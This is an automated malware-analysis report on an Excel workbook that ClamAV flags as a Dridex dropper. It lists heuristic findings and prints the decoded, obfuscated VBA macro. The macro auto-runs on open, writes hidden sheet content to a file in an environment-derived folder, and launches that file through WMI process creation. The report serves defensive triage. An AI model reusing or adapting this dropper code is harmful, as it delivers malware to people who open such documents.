MALICIOUS
Risk Score: 240

Heuristics (8)
- ClamAV: Doc.Dropper.Dridex-9845759-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0

- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings)
  Document contains a VBA project — VBA macros present

- GetObject call (high, OLE_VBA_GETOBJ)
  GetObject call. Matched line in script:
  Set YXZO3CyE = GetObject(RNUq81jrJqOHiGX).SpawnInstance_

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

- Workbook_Open macro (low, OLE_VBA_WBOPEN)
  Workbook_Open macro. Matched line in script:
  Private Sub Workbook_Open()

- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  Environ() call (env variable access). Matched line in script:
  ltQfi_BaJr_c20 = Environ(ZJ6HNKKpEoCi.GRReRYmq(Y8Qr_wS7R))

- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label gives the channel (macro, JS, link annotation, document body, ...) that reached each URL. Every URL extracted from this sample carries the label "In document text (OOXML body / shared strings)".

Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12371 bytes |

SHA-256: 74206c166dfc327f4016982b34a6bfb296ecf7b1c7946cf9a260f859a126a91d

Detection
ClamAV: No threats found
Obfuscation or payload: likely
199 of 361 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
GfcIBj3FsfxLGoGq = Array("ADiLp_IbPB_J8I IiJY_0vB", rnliu_w91x_75G_Hsn & "WLD59nN3srC D1OOCEXrVlwj" & wb2Gi_32q2, "UZlFXreyGiF" & Ov1DllcPb8GOSVzH, "G4gg_xDP_limR_xIE")
rSDJi_qAZ = InStr(GegijecBc, GCIf_Ds0, TsZnhFR5whmroBZq)
MHwp6_QNvw_qQs = WLQ1y_Q9xw_Be6H_ZrR.gwE8KJmc
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "WLQ1y_Q9xw_Be6H_ZrR"
Function gwE8KJmc()
AugxO_Pb3_geT = Len(Join(Array("iJHM_Qss Onrv_HFle kbuz_0T4_UV09_J8yB" & M7Kl_NuL_rDx_U7q, QfMXz_wN33_Iq3N, "K0whn_q5pr d0VUI_jZ1J_4zz_hHXl txyjAoW" + "HZ4boFrPaHplyO", mThM9fLaI + XwP7_LM1_jSzS_uSG, SdpWk_v9Ml_WVw - ZylLgPM & "F2drU_nnY_FmdK_pQ4 KGWs_7qgQ_D9h0 giCJIRbZLa70")))
Dim QcQbt_0veS_bDL5 As String
KljUgPZG = IsDate(CLng((838 And 815)))
QcQbt_0veS_bDL5 = M9o5I9FfqzptF9ylI.qUoERGoP6SPWSf.Text
FjFD_lZV_21q_Re6 = Gwwze463 & ltQfi_BaJr_c20 & Ce5WAPQQ & ZJ6HNKKpEoCi.NrgPYlQqg6by & nVf69sIR & OHCWZ_yMS_CTr4 & Bjtq33OMQvt & u0DQS_n1W & M9o5I9FfqzptF9ylI.eEEBxYGBQu0o0(B3hkT_i3q_K7z7_sTf) & G0fy_uSM_VlQ_jqT & XIf0_vg3_I4E & Kiag_sIy_6Ii0_U7kT.zC6f0jr(QJpi2_CAf)
For ZqIN_wdd_kUX0 = 0 To CLng(((0.536015896671634 * 2013) + xlDialogAppMove))
YDQj_Cgp_2O1_53fG = ZqIN_wdd_kUX0
Next ZqIN_wdd_kUX0
Open FjFD_lZV_21q_Re6 For Binary As #CLng((Not (-781 + (1266 - 487#))))
Put #CLng(((-931 - (-1496 - -565.002169197397)) * -461)), , QcQbt_0veS_bDL5
zyU6vEOzqdHf8 = Split(uJ57F_y0pJ_7OQw, nP00EkX, bXCOtlB0)
Close #CLng((Not ((xlDialogSetBackgroundPicture - 509.003344481605) * 598)))
PAj0GIDsOrQEYtw = FIMEC_5aup(ZMXOnHZs.Q0IY_TyF_877_D8ul, WLQ1y_Q9xw_Be6H_ZrR.MtLfx_uIY_juwR_08sb(SwTJmNzMYBexBYH) & FjFD_lZV_21q_Re6 & Chr(34), YXZO3CyE(Kiag_sIy_6Ii0_U7kT.hJWKdCLQnBYa(kudVD_cev1_20TP_iIJ)))
End Function
Function YXZO3CyE(RNUq81jrJqOHiGX)
Set YXZO3CyE = GetObject(RNUq81jrJqOHiGX).SpawnInstance_
'mDkR_2zk_c4H A2YJ_eC0_Z2kL M4MikUA0WsQJQ DsN82_LXw_PbKC_uAIE DIPq_wYNk_0D5_ciuI DefGa05HbEh ECTUqs2 E1kfC_6Z4_0H4_0hb bLIcU_Ff0_ZjHW_KXd
WFssb_XzEI_KF3x = Weekday(PWIgmqW1t)
YXZO3CyE.ShowWindow = CLng(((0.157749077490775 * 1084) - (-127 - -286#)))
Trp6WZJR0UmO = Replace(AcGIdgW8, jGNOinFL6, ziHyRa2xoZOOZt)
Mlz3MaoExDbc2Qx = Join(Array("Y4CVEXKswRTGZGcp zhm7Mu6IKGMXDZs MudJARyC4JpCR9H" & "Ufz0J_8p0_5Xx_HzbS", JLBrE1kR - Bsgt_zkNu & "Eezg6xc2 GeHmytbMrdW5MANT TMl8L4w59Sg", "X61k_J4jW vyc9wXfQ FBQ7hYsDmyz" & aveY_tQV, IGvS_6r7B + lELFE_VwP5, "herfkMT q0k45yaw IfBjh0MMGcJ3ysk", "Tzuh_v5z" & "xAocKm6A0oq2bT Dxl0_oJV iRdZ_dz1" + "Y8cm87f9asdu"))
IwO1xKBQsHRdCqKA9 = InStr(CENlcbTYKttF, FMpXE_H4Vk_bLG_iBPd, cGwNJ1Gp)
L3jN5lq10 = Array(SdnvE_K9I_t0f, MmVlKa42, "aKpFi_0rq_ugFR Tt0kM4JrWqP0gfGs N2dH4AAm")
End Function
Function ltQfi_BaJr_c20()
a76jZyrxqub9Uo = Split(KcrTx0qR684, KDZe_sZjp_Hwq_iSFY, K0021_pmD_Rjt)
QER9DTT = Abs(CLng((0.320580474934037 * (1.56611570247934 * -484))))
Oci0qjOApk3 = InStr(XVG65OBJ, HhjnP3TZ02NqVzx, Rq3hC_3FU_1qt7_1UY)
For dIUrlTp0X4TcPH = 0 To CLng((0.597426470588235 * 2176))
N7vD_BugG_Dpq_0LW4 = dIUrlTp0X4TcPH
Next dIUrlTp0X4TcPH
ltQfi_BaJr_c20 = Environ(ZJ6HNKKpEoCi.GRReRYmq(Y8Qr_wS7R))
UhTd_WEch_rRw = Split(Xuynu_5ZI_fFW, vpc4LLzUYr0oJKxI, b5CsS97jBhlh)
UnR50_3gAu_xpeT = Array(KLh0_iU7r & "ZeLKv0PpHK3", "O1CMScNQ" & "KvmY_LTw_m0c_9SuI" & "fQtQnhEjWG2a e3qG8JaZE60k", J5XfeVfGOtX0uAZL, M12pGdf97Sk - t0C3F_1gus_FfI)
GGPtN_eLZI = Split(ZlbATtG, lhG5aDyrkKMEm, Zukh0_sTtP_vXm)
OL7M62pXDjKVk4h = Abs(CLng((1019 And (1260 - 271#))))
End Function
Function FIMEC_5aup(V2QwvcUB, rJ2ju_fBM, K21EVPRq7eZb)
HBxoU4AemZAjG7Qu = Split(Cn8y_vyGR_fPWT_ZbcW, DgXYM_qZx_Xe3, GllY_bLd_pIh)
QnhtFP8jwZr6AmHH = Weekday(fe5c_RNU_Xyi)
MvpND_sIHF_jHw_yI4Z = tkoT_M6D_87fU_kkmk
YqDpG_FlyR_xLy = Split(gzEoO_H7Di_FYh_uzR, VpiY1_xCGR, WSfcC8EE8pnE)
With GetObject(V2QwvcUB)
.Create rJ2ju_fBM, Null, K21EVPRq7eZb
End With
BptecBekrLfz = Join(Array(sY0cVjwG5f9y & "MxyJtTMjpn4l" & gdqRxQ6AZRgvXj, xJvmQ1OvLrH * sBHwICbqhwlfE & hYYkc_CofU, Vgwp7_B7tJ_UIL, G1WV2QuDciQaB ^ JfJd_EQe_bg2n_ZPuF, "CWnTfSZ8T JQ4pve8wggJn Nd0v_m9Bg_jHK", "ppW8F_HsBc qYoIC5Z8P7" & "Wr17f0x IULnywWCq JQ92Z_ezF" & KhDmyJ673gIb, YnH2_1OU + OzvI_Kym_M0X_0oiV))
I4o412E1pkRj = CLng((xlCenterAcrossSelection And xlSourceChart)) < CLng((702 And 1017))
T8WOydOaYQuG = Replace(CHMi08rXprkJ8Te, PPY9_IT0_t0ls, VjpWG_QRYX)
iueJwuwOQOW3w = InStr(ScXgrvj, YJoq9_WSF, v1S7_FjUY_Z0d8)
End Function
Function MtLfx_uIY_juwR_08sb(JQsW_PvN_L7Mp)
MtLfx_uIY_juwR_08sb = ChrW(CLng((0.146913580246914 * 810))) _
& Chr(CLng(((xlDialogVbaProcedureDefinition + 71#) - 292))) _
& ChrW(CLng((125 And (-0.214 * -500)))) _
& Chr(CLng((Asc("c")))) _
& ChrW(CLng((360 + -328))) & Chr(CLng((-0.198568872987478 * -559))) & Chr(CLng((Not (291 + -407#)))) & ChrW(CLng((((-147 + -135#) + 318#) And 49))) & ChrW(CLng((xlPieExploded Or xlConeBarClustered))) & ChrW(CLng(((-600 - -600.110624315444) * 913))) & Chr(CLng((Not (0.119631901840491 * (0.837328767123288 * -1168))))) & Chr(CLng((-871 + 903))) & ChrW(CLng((xlScale Or xlDialogStyle))) _
& Chr(CLng((Not ((1094 - 336#) - 861#)))) _
& Chr(CLng((AscW("o")))) _
& Chr(CLng(((-978 + 977.859778597786) * -813))) _
& Chr(CLng(((0.111909650924025 * 974) Or xlPyramidBarClustered))) & ChrW(CLng(((823 + -726#) Or xlLineMarkers))) & Chr(CLng((AscW("t")))) & ChrW(CLng((AscW(":")))) & ChrW(CLng((xlNonEnglishFunctions Or xlOpen)))
sI1tb_S3uO_Cow = Year(W9DkC_aNX)
End Function
Attribute VB_Name = "ZJ6HNKKpEoCi"
Function NrgPYlQqg6by()
NrgPYlQqg6by = Join(Array(ChrW(CLng((Not -93)))))
Ar3YRkPdeWU1Fxuf = NxNY_lSl_ICES_9C0
'ZGsz0_zRv C6gw_oQLJ_pmO_MOE r7yBj_bFLn_Edd_qvP UojR_Uj2_qQrS NgIk5_dVXY V4ZFd_O07_NL1_DjP QGFRN_3yp4_S3O0_UJ6 ViP4EfEB dqT3_YM9j_gbO
End Function
Function GRReRYmq(KqRq_NUYO_H22H_GeTj)
GRReRYmq = Join(Array(Chr(CLng((Not ((453 - 724#) - -173#)))) _
& Chr(CLng((Not -113))) & ChrW(CLng((-0.273838630806846 * ((-1.67334915309713E-03 * 484) * xlDialogChartOptionsDataLabels)))) _
& ChrW(CLng((xlDialogCopyPicture And xlConeColStacked100))) _
& ChrW(CLng((xlAreaStacked100 Xor ((-0.856287425149701 * 334) + 330#)))) _
& ChrW(CLng((0.242171189979123 * (-467 - -946#)))) _
& Chr(CLng((xlLineStacked100 Or xlCylinderBarStacked100))) _
))
End Function
Attribute VB_Name = "M9o5I9FfqzptF9ylI"
Attribute VB_Base = "0{BF83CFBE-9A4F-4C4D-95E8-B99A15391736}{758CE4CB-1FC2-44CF-ACDB-7C90A499A36C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function eEEBxYGBQu0o0(Rid0buWWCp840Do)
BLqfZvk0fg04SbrO = Array("NmkiT_in9_qMF9" + "LlEup_0CF U6SepSSs9wMuyM D2a60HvFD3mLK" & "TC7MP_t2fX_9dAj_mp65 AEmD_hid_oKKA", WIxAs7cq8V, "YbnwY_w6T_QP52_5alU" + "dj9weXepl KcjkkrCBurZwnT4P", "tJuL_rwA r8kpc_qr4" & T3WVY_T5p_6Lf, OqzMm_QBcI)
ZIXP0_6RXH_Mfmb = Year(Q3hDuCnejwSV)
VrUNeck5 = XEho_auj_eNIB
kRDFQ_IFK_HRh = InStr(zHkL1_g8e_34X3_DhLl, HhvDYMJNAYLTzK, RlUnecKe)
eEEBxYGBQu0o0 = Hex(CLng((CLng((43344 + (-2.58024691358025 * -243))) - CLng((27622 And 26863)) + CLng((Not -26855))) * Rnd + CLng(((0.996912923142431 * 28182) Xor (xlDialogConditionalFormatting - -786#)))))
NTqEoIYhX2zFAi = Abs(CLng(((xlDialogCreateList + 443#) Or 1088)))
gqOM_UjGX = "sQiJa_50e_F8MC_vJHv"
QFR0z_bfAj_Fk7M = Split(H0m3_cuE_s7mj_XMAK, VIB0ilIbf, DwTmc_wIDG)
'PiYYX_8slo_w9ur_RccH TIh0_Xgmn nHvt_yQM7_kNZp_gY0 efP8N_EBS1_g3o_kpzR oub0BgD NtEMxd53E
XNguFKoo = Array("h3U8_w22_FIOO NHAjHcEKGLNpl" & "SEgu_i6O_UEC O1V8wzk" & "uWtsS0UjBycSsn", JeAD_0Nyy * XdGA_SWT0_ImR & "V839M_0FtC_u4y ZzNeR_b1hS_pCTv_2miT RFnkbrf4x", cEFWsOyK0sgl0Z7X & "bH1Pd6ajiSl KxZczxAxj3OAEI", ZdSL_PXog * SHRr_mVR_ycj7 - HJcL_jsjz_x23_ux6S, UJPzBTt4Xkcm & "JXYqXt3aeo24")
EZuq_NYIp = Weekday(N54NEAtsltY1)
Glr1jJ2kJjDMYtBG = Abs(CLng((1028 - 726)))
MKM3PFWNX0K = IsDate(CLng(((-368 + 366.899653979239) * -289)))
End Function
Attribute VB_Name = "Kiag_sIy_6Ii0_U7kT"
Function zC6f0jr(Hdios_EQ0u_30R_x2k)
zC6f0jr = ChrW(CLng((Not -47))) + Chr(CLng((-774 - ((-771 - -765#) + -888#)))) _
+ Chr(CLng(((-365 + 722#) + -242))) _
+ Chr(CLng((xlAccounting1 Or (508 - 404#)))) _
N8oeZaJqz = Weekday(GgvMZ_gUP_Prao_VYd)
AYZAiIY = UPuR_xmp_yr3w
End Function
Function hJWKdCLQnBYa(jLpno_QOs)
hJWKdCLQnBYa = Join(Array(Chr(CLng(((-94 + (-0.251436781609195 * -696)) Or xlPaperFanfoldUS))) + ChrW(CLng((AscW("i")))) + Chr(CLng((126 And xlDialogDeleteFormat))) _
+ Chr(CLng((AscW("m")))) + Chr(CLng((xlRadarFilled + xlAxis))) + ChrW(CLng((Not -110))) _
+ ChrW(CLng((125 And (-0.143386897404203 * -809)))) + ChrW(CLng(((-1038 + 194#) + (3.31833910034602 * 289)))) + ChrW(CLng(((0.482008995502249 * -1334) - -701))) + Chr(CLng(((0.518035303146585 * (1.36297071129707 * -956)) + 767))) _
+ ChrW(CLng((AscW("r")))) _
+ Chr(CLng((Not -112))) + ChrW(CLng((((1831 - 306#) - 752#) + -662))) + Chr(CLng((AscW("t")))) + ChrW(CLng((-237 - -329))) + ChrW(CLng(((-461 - -460.815298507463) * -536))) + ChrW(CLng((xlRangeAutoFormatTable3 + ((xlThousands - -2.87925170068027) * -588)))) + ChrW(CLng((1014 - 905))) + Chr(CLng((0.229571984435798 * 514))) + ChrW(CLng(((604 + -603.759615384615) * xlDialogSaveNewObject))) + Chr(CLng((Asc(":")))) + ChrW(CLng((Asc("W")))) + Chr(CLng(((-18# * xlParamTypeBigInt) Xor (-446 - -497#)))) _
+ Chr(CLng((Not (-559 - -448#)))) + Chr(CLng((xlWQ1 Or (-139 + (0.139084507042254 * 1136))))) + Chr(CLng((Not (827 + -878#)))) + ChrW(CLng((xlMinuteCode Or xlDialogFormatText))) + ChrW(CLng(((-918 - -934#) Or xlLineStacked100))) + Chr(CLng(((121 - 36#) Xor xlPaperFanfoldUS))) + Chr(CLng(((-1212 - -522#) - (-1519 + 718#)))) + Chr(CLng((((0.485920104780616 * 1527) - 723#) Xor xlPyramidCol))) + Chr(CLng((Asc("e")))) + ChrW(CLng((123 And 115))) _
+ ChrW(CLng((173 + (-0.114624505928854 * xlDialogChartOptionsDataTable)))) + ChrW(CLng((489 + -406))) + Chr(CLng((Not (-1054 + (1211 - 274#))))) + Chr(CLng((Not (0.132791327913279 * -738)))) + ChrW(CLng((Asc("r")))) + ChrW(CLng((Asc("t")))) + ChrW(CLng((120 Xor xlSlantDashDot))) _
+ Chr(CLng((Not -113))) _
))
End Function
Attribute VB_Name = "ZMXOnHZs"
Function Q0IY_TyF_877_D8ul()
Q0IY_TyF_877_D8ul = Chr(CLng((Not (700 - 820#)))) + ChrW(CLng(((990 + -886#) Or xlWJ3FJ3))) + ChrW(CLng((-317 + 427))) _
+ Chr(CLng((Asc("m")))) + Chr(CLng((AscW("g")))) + ChrW(CLng((Not -110))) _
+ Chr(CLng((0.115422885572139 * (1669 - 664#)))) _
+ Chr(CLng((Asc("s")))) _
+ Chr(CLng((Asc(":")))) + ChrW(CLng((xlDialogAttachText + xlPaperEnvelopeB5))) + ChrW(CLng(((2.16666666666667 * (859 - 811#)) Or xlUpperCaseColumnLetter))) + Chr(CLng((((0.809233449477352 * 1148) + -418#) - 400))) + Chr(CLng(((3.35656889212971E-04 * (0.450883002207506 * 1812)) * xlDialogFormatCharttype))) + ChrW(CLng(((294 + (0.881578947368421 * -228)) And 124))) + Chr(CLng((Not -100))) + Chr(CLng((((xlDialogOpenMail - 950#) + 761.690265486726) * -339))) _
+ ChrW(CLng((0.11925601750547 * (0.539870053160071 * 1693)))) + Chr(CLng((xlCylinderCol Or xlPaperEnvelope12))) + Chr(CLng(((-829 + (0.467488789237668 * 892)) + xlDialogSeriesY))) + Chr(CLng((xlBarStacked100 And (6.59840728100114E-02 * 879)))) + Chr(CLng((xlBubble3DEffect And xlDialogRowHeight))) + ChrW(CLng((AscW("i")))) + ChrW(CLng((xlDialogSaveCopyAs - (-212 - -558#)))) + ChrW(CLng((AscW(xlEqual)))) + ChrW(CLng((Asc(xlValidAlertWarning)))) _
_
+ Chr(CLng((-237 - -332))) + ChrW(CLng((122 And ((411 - 410.920754716981) * 1060)))) + Chr(CLng((Not -115))) + ChrW(CLng((xlPyramidBarStacked100 And xlPyramidBarStacked100))) _
+ ChrW(CLng((AscW("c")))) + ChrW(CLng((xlPaperEnvelopeMonarch Xor xlDialogFormulaFind))) + Chr(CLng(((2.45464247598719E-02 * (1619 - 682#)) Xor xlConeColStacked))) + Chr(CLng((278 - 163))) _
End Function
Function Hbv0r_SJh4(EGK6dKAg)
Hbv0r_SJh4 = Join(Array(ChrW(CLng((Not -35))) _
))
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes |

SHA-256: 081d829dcc9cb3edd907144fb39144116f3db88d1651e043915b138eb6f2bc96

Detection
ClamAV: Doc.Dropper.Dridex-9845759-0
Obfuscation or payload: unlikely